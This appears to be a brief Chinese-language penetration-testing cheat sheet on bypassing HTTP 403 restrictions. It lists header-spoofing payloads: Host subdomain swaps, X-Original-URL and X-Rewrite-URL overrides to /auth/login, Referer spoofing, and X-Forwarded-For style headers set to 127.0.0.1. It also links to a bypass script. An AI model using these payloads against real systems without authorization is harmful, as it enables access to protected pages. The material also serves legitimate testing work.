403By Pass
whatweb [http://10.0.0.13](http://10.0.0.13/)403Bypass常见方法
1.替换主机头的子域名
GET /auth/login HTTP/1.1
Host: $xxx$.abc.com
2.URL覆盖
GET / HTTP/1.1
方法一:
X-Original-URL: /auth/login
方法二:
X-Rewrite-URL: /auth/login
方法三:
ReFerer: http://xxx/auth/login
3.反向代理
Host: 10.0.0.13
X-Originating-IP: 127.0.0.1
或
X-Remote-IP: 127.0.0.1
或
X-Forwarded-For: 127.0.0.1403 bypass 脚本:https://www.freebuf.com/sectool/259663.html
可以使用Burp+jython效果更好
最后更新于
这有帮助吗?